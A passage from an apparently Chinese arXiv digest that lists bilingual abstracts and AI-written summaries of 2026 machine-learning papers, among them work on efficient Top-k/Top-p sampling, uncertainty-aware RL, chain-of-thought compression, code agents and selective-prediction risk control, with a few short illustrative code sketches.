AI总结 提出Qrita算法,通过基于高斯sigma截断和四元枢轴搜索的枢轴方法,高效实现Top-k和Top-p采样,在保持与排序算法相同输出的同时,将端到端服务吞吐量提升至1.4倍并减少一半内存使用。

详情
AI中文摘要

尽管Top-k和Top-p算法在模型采样中很重要,但对于大词汇表的高效实现仍然是一个重大挑战。现有方法通常依赖于排序,这在GPU上会带来显著的计算和内存开销,或者依赖于改变算法输出的随机方法。在这项工作中,我们提出了Qrita,一种基于枢轴截断和选择的高效Top-k和Top-p算法。Qrita利用基于枢轴的搜索来实现Top-k和Top-p,并采用两种关键技术:1. 基于高斯的sigma截断,大大减少了词汇表的搜索空间;2. 具有重复处理能力的四元枢轴搜索,将枢轴搜索迭代次数减半并保证确定性输出。我们使用Triton实现了Qrita,并针对高性能LLM执行引擎(如SGLang和FlashInfer)的Top-k和Top-p内核评估了其性能,将端到端服务吞吐量最高提升至1.4倍,同时内存使用量减半,并提供了与基于排序算法相同的输出。Qrita现在是vLLM GPU执行路径的默认Top-k和Top-p采样器,Qrita的三元实现可在https://github.com/vllm-project/vllm/blob/main/vllm/v1/sample/ops/topk_topp_triton.py获取。

英文摘要

Despite their importance in model sampling, efficient implementation of Top-k and Top-p algorithms for large vocabularies remains a significant challenge. Existing approaches often rely on sorting, which incurs significant computation and memory overhead on GPUs, or on stochastic approaches that alter the algorithm's output. In this work, we propose Qrita, an efficient Top-k and Top-p algorithm based on pivot-based truncation and selection. Qrita leverages pivot-based search for both Top-k and Top-p with two key techniques: 1. Gaussian-based sigma-truncation, which greatly reduces the search space of the vocabulary, and 2. Quaternary pivot search with duplication handling, which halves the number of pivot search iterations and guarantees deterministic output. We implement Qrita using Triton and evaluate its performance against the Top-k and Top-p kernels of high-performance LLM execution engines such as SGLang and FlashInfer, improving end-to-end serving throughput by up to 1.4 times with half the memory usage, while providing the same output as the sorting-based algorithms. Qrita is now the default Top-k and Top-p sampler for the GPU execution path of vLLM, and a ternary implementation of Qrita is available at https://github.com/vllm-project/vllm/blob/main/vllm/v1/sample/ops/topk_topp_triton.py.
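
To make the contrast between sorting and pivot-based selection concrete, here is a minimal pure-Python sketch of Top-k without a sort. It is not Qrita and not the vLLM Triton kernel: it uses a single quickselect-style pivot per round rather than quaternary search, and it omits Gaussian sigma-truncation. The function names are hypothetical, and the tie rule (lower indices win at the threshold) is an assumption chosen so that the result matches a stable sort.

```python
def kth_largest_by_pivot(values, k):
    """Find the k-th largest value by repeated pivot partitioning (no sort)."""
    cand = list(values)
    need = k  # rank, counted from the top, still to locate inside cand
    while True:
        pivot = cand[len(cand) // 2]  # fixed pivot rule keeps runs deterministic
        above = [v for v in cand if v > pivot]
        equal = sum(1 for v in cand if v == pivot)
        if need <= len(above):
            cand = above
        elif need <= len(above) + equal:
            return pivot
        else:
            need -= len(above) + equal
            cand = [v for v in cand if v < pivot]


def top_k_indices(logits, k):
    """Indices of the k largest logits; ties at the threshold go to lower indices."""
    if not 1 <= k <= len(logits):
        raise ValueError("k must be between 1 and len(logits)")
    threshold = kth_largest_by_pivot(logits, k)
    keep = [i for i, v in enumerate(logits) if v > threshold]
    ties = [i for i, v in enumerate(logits) if v == threshold]
    return sorted(keep + ties[: k - len(keep)])


def top_k_indices_sorted(logits, k):
    """Sorting-based reference (Python's sort is stable)."""
    order = sorted(range(len(logits)), key=lambda i: -logits[i])
    return sorted(order[:k])


logits = [1.0, 3.0, 3.0, 2.0, 5.0]  # note the duplicated value 3.0
print(top_k_indices(logits, 2), top_k_indices_sorted(logits, 2))
```

The explicit handling of values equal to the pivot is what keeps the selection deterministic when logits repeat, which is the same concern the abstract raises under duplication handling.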

2601.22648 2026-05-27 cs.AI cs.LG 版本更新

UCPO: Uncertainty-Aware Policy Optimization

UCPO:不确定性感知策略优化

Xianzhou Zeng, Jing Huang, Chunmei Xie, Gongrui Nan, Siye Chen, Mengyu Lu, Weiqi Xiong, Qixuan Zhou, Junhao Zhang, Qiang Zhu, Yadong Li, Xingzhong Xu

AI总结 针对现有强化学习范式在不确定性奖励下存在的优势偏差和过度自信问题,提出三元优势解耦和动态不确定性奖励调整机制,显著提升模型在知识边界外的可靠性。

Comments Accepted by ICML 2026

详情
AI中文摘要

构建可信赖的大语言模型的关键在于赋予其内在的不确定性表达能力,从而减轻高风险应用中的过度自信错误。然而,现有的强化学习范式(如GRPO)由于二元决策空间和静态不确定性奖励,常常遭受优势偏差,导致过度保守或过度自信。为了解决这一挑战,本文揭示了当前结合不确定性奖励的强化学习范式中奖励破解和过度自信的根本原因,并在此基础上提出了不确定性感知策略优化(UCPO)框架。UCPO采用三元优势解耦来分离并独立归一化确定性和不确定性轨迹,从而消除优势偏差。此外,动态不确定性奖励调整机制根据模型演化和实例难度实时调整不确定性权重。在数学推理和通用任务上的实验结果表明,UCPO有效解决了奖励不平衡问题,显著提高了模型在知识边界外的可靠性。

英文摘要

The key to building trustworthy large language models (LLMs) lies in endowing them with inherent uncertainty expression capabilities, thereby mitigating overconfident errors in high-stakes applications. However, existing RL paradigms such as GRPO often suffer from Advantage Bias due to binary decision spaces and static uncertainty rewards, inducing either excessive conservatism or overconfidence. To tackle this challenge, this paper unveils the root causes of reward hacking and overconfidence in current RL paradigms incorporating uncertainty-based rewards, based on which we propose the UnCertainty-Aware Policy Optimization (UCPO) framework. UCPO employs Ternary Advantage Decoupling to separate and independently normalize deterministic and uncertain rollouts, thereby eliminating advantage bias. Furthermore, a Dynamic Uncertainty Reward Adjustment mechanism adapts uncertainty weights in real time according to model evolution and instance difficulty. Experimental results in mathematical reasoning and general tasks demonstrate that UCPO effectively resolves the reward imbalance, significantly improving the reliability of the model beyond its knowledge boundaries.
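
The abstract does not spell out how the advantages are decoupled, so the sketch below shows only one plausible reading: rollouts that express uncertainty and rollouts that commit to an answer are normalized in separate groups, instead of jointly as in a GRPO-style group baseline. The reward values, the `is_uncertain` flags, and both function names are hypothetical.

```python
import math


def normalize(rewards):
    """Zero-mean, unit-std rewards; all zeros when the group has no spread."""
    mean = sum(rewards) / len(rewards)
    std = math.sqrt(sum((r - mean) ** 2 for r in rewards) / len(rewards))
    if std == 0.0:
        return [0.0 for _ in rewards]
    return [(r - mean) / std for r in rewards]


def decoupled_advantages(rewards, is_uncertain):
    """Normalize deterministic and uncertain rollouts in separate groups."""
    advantages = [0.0] * len(rewards)
    for flag in (False, True):
        idx = [i for i, u in enumerate(is_uncertain) if u == flag]
        if idx:
            for i, a in zip(idx, normalize([rewards[i] for i in idx])):
                advantages[i] = a
    return advantages


# Four committed answers (right/wrong) and two "uncertain" rollouts that
# receive a fixed partial reward (assumed values).
rewards = [1.0, 0.0, 1.0, 0.0, 0.2, 0.2]
is_uncertain = [False, False, False, False, True, True]

joint = normalize(rewards)
decoupled = decoupled_advantages(rewards, is_uncertain)
print(joint)
print(decoupled)
```

With joint normalization the uncertain rollouts receive a negative advantage purely because their fixed reward sits below the group mean. Normalizing them separately removes that dependence on how the static uncertainty reward was chosen.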

2601.22476 2026-05-27 cs.AR cs.AI 版本更新

RulePlanner: All-in-One Reinforcement Learner for Unifying Design Rules in 3D Floorplanning

RulePlanner: 用于统一3D布局规划中设计规则的全能强化学习器

Ruizhe Zhong, Xingbo Du, Junchi Yan

发表机构 * Shanghai Jiao Tong University(上海交通大学) Mohamed bin Zayed University of Artificial Intelligence(穆罕默德·本·扎耶德人工智能大学)

AI总结 提出一种基于深度强化学习的统一框架,通过新颖的矩阵表示、动作空间约束和奖励信号定量分析,处理多种硬件设计规则,实现3D布局规划中的规则遵守。

Comments ICML 2026

详情
AI中文摘要

布局规划决定了集成电路中每个模块的坐标和形状。随着技术节点的缩放,在布局规划阶段,特别是具有多个堆叠层的3D场景中,遵守复杂的硬件设计规则变得越来越具有挑战性。当前方法只能处理特定且有限的设计规则,而其他规则的违反需要手动和细致的调整。这导致专家工程师需要劳动密集且耗时的后处理。在本文中,我们提出了一种基于深度强化学习的全能方法来解决这些挑战,并为先前方法未解决的现实IC设计规则设计了新颖的表示。具体来说,各种硬件设计规则的处理被统一到一个具有三个关键组件的单一框架中:1)用于建模设计规则的新颖矩阵表示,2)对动作空间的约束以过滤掉导致规则违反的无效动作,以及3)约束满足的定量分析作为奖励信号。在公共基准上的实验证明了我们方法的有效性和正确性。此外,在未见过的电路上很好地展示了可迁移性。我们的框架可扩展以容纳新的设计规则,从而为应对未来芯片设计中的新兴挑战提供灵活性。代码将在以下网址提供:https://github.com/Thinklab-SJTU/EDA-AI

英文摘要

Floorplanning determines the coordinates and shape of each module in an integrated circuit. As technology nodes scale, adhering to complex hardware design rules at the floorplanning stage has become increasingly challenging, especially in 3D scenarios with multiple stacked layers. Current methods can handle only a specific, limited set of design rules, while violations of other rules require meticulous manual adjustment. This leads to labor-intensive and time-consuming post-processing for expert engineers. In this paper, we propose an all-in-one deep reinforcement learning-based approach to tackle these challenges, and design novel representations for real-world IC design rules that have not been addressed by previous approaches. Specifically, the processing of various hardware design rules is unified into a single framework with three key components: 1) novel matrix representations to model the design rules, 2) constraints on the action space to filter out invalid actions that cause rule violations, and 3) quantitative analysis of constraint satisfaction as reward signals. Experiments on public benchmarks demonstrate the effectiveness and validity of our approach. Furthermore, transferability is demonstrated on unseen circuits. Our framework is extensible to accommodate new design rules, thus providing flexibility to address emerging challenges in future chip design. Code will be available at: https://github.com/Thinklab-SJTU/EDA-AI

2601.22384 2026-05-27 cs.LG cs.AI 版本更新

Graph is a Substrate Across Data Modalities

图是跨数据模态的基板

Ziming Li, Xiaoming Wu, Zehong Wang, Jiazheng Li, Yijun Tian, Jinhe Bi, Yunpu Ma, Yanfang Ye, Chuxu Zhang

发表机构 * University of Connecticut(康涅狄格大学) University of Notre Dame(圣母大学) National University of Singapore(新加坡国立大学)

AI总结 提出G-Substrate框架,通过统一结构模式和交错角色训练策略,使图结构作为共享基板跨模态和任务积累,优于孤立和朴素多任务方法。

Comments Graph structure across data modalities, accepted by ICML26

详情
AI中文摘要

图提供了跨不同领域出现的自然关系结构表示。尽管无处不在,图结构通常以模态和任务隔离的方式学习,即在单个任务上下文中构建图表示,然后丢弃。因此,跨模态和任务的结构规律被反复重建,而不是在中间图表示级别积累。这引发了一个表示学习问题:如何组织图结构,使其能够跨异构模态和任务持久存在并积累?我们采用以表示为中心的视角,将图结构视为跨学习上下文持久存在的结构基板。为了实例化这一视角,我们提出了G-Substrate,一个围绕共享图结构组织学习的图基板框架。G-Substrate包含两个互补机制:一个统一的结构模式,确保跨异构模态和任务的图表示兼容性;以及一个交错基于角色的训练策略,在学习过程中将同一图结构暴露给多个功能角色。跨多个领域、模态和任务的实验表明,G-Substrate优于任务隔离和朴素多任务学习方法。代码库、模型和数据集可在https://github.com/zmli6/G-Substrate获取。

英文摘要

Graphs provide a natural representation of relational structure that arises across diverse domains. Despite this ubiquity, graph structure is typically learned in a modality- and task-isolated manner, where graph representations are constructed within individual task contexts and discarded thereafter. As a result, structural regularities across modalities and tasks are repeatedly reconstructed rather than accumulated at the level of intermediate graph representations. This motivates a representation-learning question: how should graph structure be organized so that it can persist and accumulate across heterogeneous modalities and tasks? We adopt a representation-centric perspective in which graph structure is treated as a structural substrate that persists across learning contexts. To instantiate this perspective, we propose G-Substrate, a graph substrate framework that organizes learning around shared graph structures. G-Substrate comprises two complementary mechanisms: a unified structural schema that ensures compatibility among graph representations across heterogeneous modalities and tasks, and an interleaved role-based training strategy that exposes the same graph structure to multiple functional roles during learning. Experiments across multiple domains, modalities, and tasks show that G-Substrate outperforms task-isolated and naive multi-task learning methods. The codebase, model, and datasets are available at https://github.com/zmli6/G-Substrate.

2601.21789 2026-05-27 cs.LG cs.AI stat.ML 版本更新

ECSEL: Explainable Classification via Signomial Equation Learning

ECSEL: 通过Signomial方程学习的可解释分类

Adia Lumadjeng, Ilker Birbil, Erman Acar

发表机构 * Amsterdam Business School, University of Amsterdam, Amsterdam, the Netherlands(阿姆斯特丹大学阿姆斯特丹商学院) Institute for Informatics, University of Amsterdam(阿姆斯特丹大学信息学院) Institute for Logic, Language and Computation, University of Amsterdam(阿姆斯特丹大学逻辑、语言与计算研究所)

AI总结 提出ECSEL方法,通过学习signomial方程形式的闭式表达式实现可解释分类,在符号回归基准上以更低计算量恢复更多目标方程,并保持分类精度与可解释性。

Comments 9 pages, 4 figures, accepted at ICML 2026

详情
AI中文摘要

我们引入ECSEL,一种可解释的分类方法,它学习signomial方程形式的形式化表达式,其动机是观察到许多符号回归基准具有紧凑的signomial结构。ECSEL直接构建一个结构化的闭式表达式,同时作为分类器和解释。在标准符号回归基准上,我们的方法比竞争的最新方法恢复更大比例的目标方程,同时所需计算量大幅减少。利用这种效率,ECSEL在不牺牲可解释性的情况下实现了与已建立的机器学习模型竞争的分类精度。此外,我们展示了ECSEL在全局特征行为、决策边界分析和局部特征归因方面满足一些理想性质。在基准数据集和两个真实世界案例研究(即电子商务和欺诈检测)上的实验表明,学习到的方程暴露了数据集偏差,支持反事实推理,并产生可操作的见解。

英文摘要

We introduce ECSEL, an explainable classification method that learns formal expressions in the form of signomial equations, motivated by the observation that many symbolic regression benchmarks admit compact signomial structure. ECSEL directly constructs a structural, closed-form expression that serves as both a classifier and an explanation. On standard symbolic regression benchmarks, our method recovers a larger fraction of target equations than competing state-of-the-art approaches while requiring substantially less computation. Leveraging this efficiency, ECSEL achieves classification accuracy competitive with established machine learning models without sacrificing interpretability. Further, we show that ECSEL satisfies some desirable properties regarding global feature behavior, decision-boundary analysis, and local feature attributions. Experiments on benchmark datasets and two real-world case studies (e-commerce and fraud detection) demonstrate that the learned equations expose dataset biases, support counterfactual reasoning, and yield actionable insights.
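
For readers unfamiliar with the term, a signomial is a sum of monomials with real coefficients and real exponents over strictly positive inputs: f(x) = sum_k c_k * prod_i x_i^(a_ki). The sketch below only evaluates such a function and thresholds it at zero. How ECSEL learns the coefficients and exponents, and how it turns the expression into a class decision, is not stated in the abstract, so the zero threshold and the example coefficients are assumptions.

```python
import numpy as np

def signomial(x, coeffs, exponents):
    """Evaluate f(x) = sum_k coeffs[k] * prod_i x[:, i] ** exponents[k, i].

    x: (n_samples, n_features), strictly positive
    coeffs: (n_terms,), any real sign
    exponents: (n_terms, n_features), any real values
    """
    x = np.asarray(x, dtype=float)
    if np.any(x <= 0):
        raise ValueError("inputs must be strictly positive")
    # log-space product: prod_i x_i ** a_i == exp(sum_i a_i * log x_i)
    monomials = np.exp(np.log(x) @ np.asarray(exponents, dtype=float).T)
    return monomials @ np.asarray(coeffs, dtype=float)

# Hypothetical expression: f(x1, x2) = 2 * x1 / x2 - 3 * sqrt(x1)
coeffs = np.array([2.0, -3.0])
exponents = np.array([[1.0, -1.0],
                      [0.5, 0.0]])
X = np.array([[4.0, 2.0],
              [9.0, 1.0]])
scores = signomial(X, coeffs, exponents)
labels = (scores > 0).astype(int)  # assumed decision rule: threshold at zero
```

Because the whole model is the closed-form expression, the score of each sample can be read off term by term: the first sample scores 2*4/2 - 3*2 = -2 and the second 2*9/1 - 3*3 = 9.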

2601.21576 2026-05-27 cs.AI 版本更新

Chain Of Thought Compression: A Theoretical Analysis

思维链压缩:理论分析

Juncai Li, Ru Li, Yuxiang Zhou, Boxiang Ma, Jeff Z. Pan

发表机构 * School of Computer and Information Technology, Shanxi University, Taiyuan, Shanxi, China(山西大学计算机与信息技术学院) Queen Mary, University of London, UK(伦敦玛丽女王大学) School of Informatics, University of Edinburgh, UK(爱丁堡大学信息学院)

AI总结 本文通过引入Order-r Interaction理论,证明了隐式思维链压缩中高阶逻辑依赖的学习信号指数衰减问题,并提出ALiCoT框架通过对齐潜在令牌分布与中间推理状态来克服信号衰减,实现54.4倍加速且性能与显式CoT相当。

详情
AI中文摘要

思维链(CoT)通过中间步骤解锁了大语言模型(LLMs)的高级推理能力,但由于生成额外令牌而带来了高昂的计算成本。最近的研究经验表明,将推理步骤压缩到潜在状态中,即隐式CoT压缩,提供了一种令牌高效的替代方案。然而,CoT压缩背后的机制仍不清楚。在本文中,我们首次对学习内化中间推理步骤的难度进行了理论分析。通过引入Order-r Interaction,我们证明了高阶逻辑依赖的学习信号指数衰减以解决不可约问题,其中跳过中间步骤不可避免地导致高阶交互障碍。为了经验验证这一点,我们引入了NatBool-DAG,这是一个具有挑战性的基准测试,旨在强制执行不可约逻辑推理并消除语义捷径。在我们的理论发现指导下,我们提出了ALiCoT(对齐隐式CoT),一种新颖的框架,通过对齐潜在令牌分布与中间推理状态来克服信号衰减。实验结果表明,ALiCoT成功解锁了高效推理:它实现了54.4倍加速,同时保持与显式CoT相当的性能。

英文摘要

Chain-of-Thought (CoT) has unlocked advanced reasoning abilities of Large Language Models (LLMs) through intermediate steps, yet incurs prohibitive computational costs due to the generation of extra tokens. Recent studies empirically show that compressing reasoning steps into latent states, or implicit CoT compression, offers a token-efficient alternative. However, the mechanism behind CoT compression remains unclear. In this paper, we provide the first theoretical analysis of the difficulty of learning to internalize intermediate reasoning steps. By introducing Order-r Interaction, we prove that the learning signal for high-order logical dependencies decays exponentially when solving irreducible problems, where skipping intermediate steps inevitably leads to high-order interaction barriers. To empirically validate this, we introduce NatBool-DAG, a challenging benchmark designed to enforce irreducible logical reasoning and eliminate semantic shortcuts. Guided by our theoretical findings, we propose ALiCoT (Aligned Implicit CoT), a novel framework that overcomes the signal decay by aligning latent token distributions with intermediate reasoning states. Experimental results demonstrate that ALiCoT successfully unlocks efficient reasoning: it achieves a 54.4x speedup while maintaining performance comparable to explicit CoT.

2601.18904 2026-05-27 cs.SD cs.AI cs.CL 版本更新

MetaSICL: Adapting Auditory LLM via Meta Speech In-Context Learning

MetaSICL: 通过元语音上下文学习适应听觉大语言模型

Haolong Zheng, Siyin Wang, Zengrui Jin, Mark Hasegawa-Johnson

发表机构 * University of Illinois Urbana Champaign(伊利诺伊大学厄巴纳-香槟分校) Tsinghua University(清华大学)

AI总结 提出MetaSICL方法,利用高资源语音数据通过元学习增强听觉大语言模型的上下文学习能力,在低资源场景下优于直接微调。

详情
AI中文摘要

听觉大语言模型在广泛的语音和音频理解任务中表现出强大的性能。然而,当应用于低资源任务时,它们常常遇到困难。如果域内标注数据稀缺或与真实测试分布不匹配,直接微调可能不稳定。上下文学习通过基于少量域内示例的条件化来适应听觉大语言模型,提供了一种无需训练、推理时的解决方案。在这项工作中,我们首先表明,$\textit{Vanilla ICL}$ 在选定的模型上提高了跨多种语音和音频任务的零样本性能,这表明这种ICL适应能力可以推广到多模态设置。在此基础上,我们提出了$\textbf{Meta Speech In-Context Learning (MetaSICL)}$,这是一种后训练方法,仅利用来自各种任务的高资源语音数据,旨在增强模型的上下文学习能力。实验表明,我们提出的方法在低资源场景下优于直接微调。

英文摘要

Auditory Large Language Models (LLMs) have demonstrated strong performance across a wide range of speech and audio understanding tasks. Nevertheless, they often struggle when applied to low-resource tasks. When in-domain labeled data are scarce or mismatched with the true test distribution, direct fine-tuning can be brittle. In-Context Learning (ICL) provides a training-free, inference-time solution by adapting auditory LLMs through conditioning on a few in-domain demonstrations. In this work, we first show that $\textit{Vanilla ICL}$ improves zero-shot performance across diverse speech and audio tasks for selected models, which suggests that this ICL adaptation capability can be generalized to the multimodal setting. Building on this, we propose $\textbf{Meta Speech In-Context Learning (MetaSICL)}$, a post-training recipe that uses only high-resource speech data from various tasks to strengthen the model's in-context learning capability. Experiments indicate that our proposed method outperforms direct fine-tuning in low-resource scenarios.

2601.18381 2026-05-27 cs.AI cs.SE 版本更新

AI Agent for Reverse-Engineering Legacy Finite-Difference Code and Translating to Devito

AI Agent 用于逆向工程遗留有限差分代码并转换为 Devito

Yinghan Hou, Zongyou Yang

发表机构 * Department of Earth Science and Engineering(地球科学与工程系) Imperial College London(伦敦帝国理工学院) Department of Computer Science(计算机科学系) University College London(伦敦大学学院)

AI总结 本研究提出一个集成 AI Agent 框架,结合检索增强生成(RAG)和开源大语言模型,通过多阶段迭代工作流将遗留有限差分代码转换为 Devito 环境,并引入强化学习反馈机制实现动态自适应代码翻译。

Comments 14 pages, 7 figures

详情
AI中文摘要

为了促进遗留有限差分实现向 Devito 环境的转换,本研究开发了一个集成的 AI Agent 框架。检索增强生成(RAG)和开源大语言模型通过系统混合 LangGraph 架构中的多阶段迭代工作流相结合。该 Agent 通过文档解析、结构感知分割、实体关系提取和基于 Leiden 的社区检测构建了一个广泛的 Devito 知识图谱。GraphRAG 优化增强了跨语义社区的查询性能,这些社区包括地震波模拟、计算流体动力学和性能调优库。一个逆向工程组件通过 Fortran 源代码的静态分析推导出用于 RAG 检索的三级查询策略。为了为语言模型指导提供精确的上下文信息,多阶段检索流水线执行并行搜索、概念扩展、社区级检索和语义相似性分析。代码合成受基于 Pydantic 的约束控制,以保证结构化输出和可靠性。一个全面的验证框架将传统静态分析与 G-Eval 方法相结合,涵盖执行正确性、结构健全性、数学一致性和 API 合规性。整个 Agent 工作流在 LangGraph 框架上实现,并采用并发处理以支持基于质量的迭代细化和状态感知的动态路由。主要贡献在于引入了受强化学习启发的反馈机制,实现了从静态代码翻译向动态自适应分析行为的转变。

英文摘要

To facilitate the transformation of legacy finite difference implementations into the Devito environment, this study develops an integrated AI agent framework. Retrieval-Augmented Generation (RAG) and open-source Large Language Models are combined through multi-stage iterative workflows in the system's hybrid LangGraph architecture. The agent constructs an extensive Devito knowledge graph through document parsing, structure-aware segmentation, extraction of entity relationships, and Leiden-based community detection. GraphRAG optimisation enhances query performance across semantic communities that include seismic wave simulation, computational fluid dynamics, and performance tuning libraries. A reverse engineering component derives three-level query strategies for RAG retrieval through static analysis of Fortran source code. To deliver precise contextual information for language model guidance, the multi-stage retrieval pipeline performs parallel searching, concept expansion, community-scale retrieval, and semantic similarity analysis. Code synthesis is governed by Pydantic-based constraints to guarantee structured outputs and reliability. A comprehensive validation framework integrates conventional static analysis with the G-Eval approach, covering execution correctness, structural soundness, mathematical consistency, and API compliance. The overall agent workflow is implemented on the LangGraph framework and adopts concurrent processing to support quality-based iterative refinement and state-aware dynamic routing. The principal contribution lies in the incorporation of feedback mechanisms motivated by reinforcement learning, enabling a transition from static code translation toward dynamic and adaptive analytical behavior.

2512.20957 2026-05-27 cs.SE cs.AI 版本更新

One Tool Is Enough: Reinforcement Learning for Repository-Level LLM Agents

一个工具就够了:面向仓库级LLM智能体的强化学习

Zhaoxi Zhang, Yitong Duan, Yanzhi Zhang, Yiming Xu, Zhixiang Wang, Kun Liang, Weikang Li, Jiahui Liang, Deguo Xia, Jizhou Huang, Jiyan He, Yunfang Wu

发表机构 * National Key Laboratory for Multimedia Information Processing, Peking University(北京大学多媒体信息处理全国重点实验室) School of Computer Science, Peking University(北京大学计算机科学学院) Zhongguancun Institute of Artificial Intelligence (ZGCI)(中关村人工智能研究院(ZGCI)) Baidu Inc(百度公司)

AI总结 提出RepoNavigator,一个仅配备单一执行感知工具(跳转到调用符号定义)的LLM智能体,通过强化学习端到端训练,在仓库级问题定位中达到最先进性能。

详情
AI中文摘要

在大型软件仓库中定位需要修改的文件和函数由于规模和结构复杂性而具有挑战性。现有的基于LLM的方法通常将其视为仓库级检索任务,并依赖多个辅助工具,这些工具常常忽略代码执行逻辑并使模型控制复杂化。我们提出RepoNavigator,一个配备单一执行感知工具的LLM智能体:跳转到调用符号的定义。这种统一设计反映了代码执行的实际流程,同时简化了工具操作。RepoNavigator通过强化学习(RL)直接从基础预训练模型进行端到端训练,不依赖闭源蒸馏。实验表明,经过RL训练的RepoNavigator实现了最先进的性能,7B模型优于14B基线,14B模型超越32B竞争对手,32B模型在大多数指标上超过闭源模型如GPT-5。这些结果证实,将单一的、结构基础的工具与RL训练相结合,为仓库级问题定位提供了高效且可扩展的解决方案。

英文摘要

Locating files and functions requiring modification in large software repositories is challenging due to their scale and structural complexity. Existing LLM-based methods typically treat this as a repository-level retrieval task and rely on multiple auxiliary tools, which often overlook code execution logic and complicate model control. We propose RepoNavigator, an LLM agent equipped with a single execution-aware tool: jumping to the definition of an invoked symbol. This unified design reflects the actual flow of code execution while simplifying tool manipulation. RepoNavigator is trained end-to-end via Reinforcement Learning (RL) directly from a base pretrained model, without relying on closed-source distillation. Experiments demonstrate that RL-trained RepoNavigator achieves state-of-the-art performance, with the 7B model outperforming 14B baselines, the 14B model surpassing 32B competitors, and the 32B model exceeding closed-source models such as GPT-5 on most metrics. These results confirm that integrating a single, structurally grounded tool with RL training provides an efficient and scalable solution for repository-level issue localization.
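
To make the idea of a single "jump to definition" tool concrete, here is a deliberately simplified sketch using Python's standard `ast` module. It is not RepoNavigator's tool: the real tool is described as execution-aware and operates across a repository, whereas this hypothetical `jump_to_definition` does a name-based lookup inside one source string.

```python
import ast

def jump_to_definition(source: str, symbol: str):
    """Return (line number, source text) of the first function or class
    named `symbol` in `source`, or None if no such definition exists."""
    tree = ast.parse(source)
    for node in ast.walk(tree):
        is_definition = isinstance(
            node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)
        )
        if is_definition and node.name == symbol:
            return node.lineno, ast.get_source_segment(source, node)
    return None

# Hypothetical file content an agent might be inspecting.
SOURCE = '''def helper(x):
    return x + 1

def main():
    return helper(41)
'''

# The agent sees the call `helper(41)` inside `main` and follows it.
result = jump_to_definition(SOURCE, "helper")
```

An agent with only this one action explores code by repeatedly following invoked symbols, which mirrors the call chain instead of searching by text similarity.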

2512.01556 2026-05-27 cs.AI cs.CL cs.LG 版本更新

LEC: Linear Expectation Constraints for Selection-Conditioned Risk Control in Selective Prediction and Routing Systems

LEC: 选择性预测与路由系统中基于选择条件风险控制的线性期望约束

Zhiyuan Wang, Aniri, Tianlong Chen, Yue Zhang, Heng Tao Shen, Xiaoshuang Shi, Kaidi Xu

发表机构 * University of Electronic Science and Technology of China(电子科技大学) Munich Center for Machine Learning(慕尼黑机器学习中心) University of North Carolina at Chapel Hill(北卡罗来纳大学教堂山分校) Shandong University(山东大学) Tongji University(同济大学) City University of Hong Kong(香港城市大学)

AI总结 提出LEC框架,通过线性期望约束将选择性预测转化为决策问题,在可交换性假设下利用校准集计算风险约束下的保留最大化阈值,并扩展到双模型路由系统,实现选择条件误差控制。

Comments Accepted by ICML 2026 Regular

详情
AI中文摘要

基础模型常常生成不可靠的答案,而启发式不确定性估计器无法完全区分正确与错误输出,导致用户在没有统计保证的情况下接受错误答案。我们通过选择条件风险控制来解决这个问题,旨在确保接受的预测的错误概率不超过用户指定的风险水平。为此,我们提出了LEC,一个原则性框架,将选择性预测重新定义为由选择和错误指标上的线性期望约束控制的决策问题。该公式直接控制接受错误期望数与接受预测期望数之间的比率,这对应于选择条件下的边际错误概率。在可交换性下,我们推导出一个仅依赖于保留校准集的有限样本充分条件,从而能够计算风险约束下的保留最大化阈值。此外,我们将LEC扩展到双模型路由系统:如果主模型的不确定性超过其校准阈值,则输入被委托给后续模型,同时保持系统级的选择条件误差控制。在封闭式和开放式问答(QA)以及视觉问答(VQA)上的实验表明,LEC在接受的预测中维持了规定的风险水平,并且与基线相比显著提高了样本保留率。

英文摘要

Foundation models often generate unreliable answers, while heuristic uncertainty estimators fail to fully distinguish correct from incorrect outputs, causing users to accept erroneous answers without any statistical guarantee. We address this problem through selection-conditioned risk control, aiming to ensure that an accepted prediction has an error probability no larger than a user-specified risk level. To this end, we propose LEC, a principled framework that reframes selective prediction as a decision problem governed by a linear expectation constraint over selection and error indicators. This formulation directly controls the ratio between the expected number of accepted errors and the expected number of accepted predictions, which corresponds to the marginal error probability conditioned on selection. Under exchangeability, we derive a finite-sample sufficient condition that relies only on a held-out calibration set, enabling the computation of a risk-constrained, retention-maximizing threshold. Furthermore, we extend LEC to two-model routing systems: if the primary model's uncertainty exceeds its calibrated threshold, the input is delegated to a subsequent model, while maintaining system-level selection-conditioned error control. Experiments on both closed-ended and open-ended question answering (QA) and vision question answering (VQA) demonstrate that LEC maintains the prescribed risk level in accepted predictions and substantially improves sample retention compared to baselines.
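
The constraint described above can be written as E[S * (Err - alpha)] <= 0, where S is the selection indicator and Err the error indicator; dividing by E[S] gives the ratio of expected accepted errors to expected accepted predictions. The sketch below applies only the empirical version of that constraint to a calibration set. It does not reproduce the paper's finite-sample condition: the `slack` parameter is a hypothetical placeholder for such a correction, and the data are made up.

```python
import numpy as np

def calibrate_threshold(uncertainty, is_error, alpha, slack=0.0):
    """Largest threshold t such that accepting all samples with
    uncertainty <= t satisfies sum_i (err_i - alpha) + slack <= 0.
    Returns None when no threshold is feasible."""
    u = np.asarray(uncertainty, dtype=float)
    e = np.asarray(is_error, dtype=float)
    if u.size == 0:
        return None
    order = np.argsort(u, kind="stable")
    u_sorted, e_sorted = u[order], e[order]
    running = np.cumsum(e_sorted - alpha) + slack
    # With ties, a threshold accepts every sample sharing that value,
    # so only the last index of each distinct value is a valid cut.
    last_of_value = np.append(u_sorted[1:] != u_sorted[:-1], True)
    feasible = np.flatnonzero(last_of_value & (running <= 0))
    return None if feasible.size == 0 else float(u_sorted[feasible[-1]])

# Made-up calibration data: uncertainty scores and error indicators.
u = np.array([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8])
err = np.array([0, 0, 0, 1, 0, 0, 1, 1])
threshold = calibrate_threshold(u, err, alpha=0.25)
accepted = u <= threshold
accepted_error_rate = err[accepted].mean()
```

On this toy data the threshold is 0.6: six predictions are accepted with one error (rate 1/6), while accepting a seventh would raise the rate to 2/7 and violate the 0.25 risk level. In a two-model router, inputs above the threshold would be passed to the second model instead of being rejected.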

2601.14702 2026-05-27 cs.AI cs.CV cs.RO 版本更新

Drive-P2D: A Progressive Perception-to-Decision Benchmark for VLMs in Autonomous Driving

Drive-P2D:自动驾驶中视觉语言模型的渐进式感知到决策基准

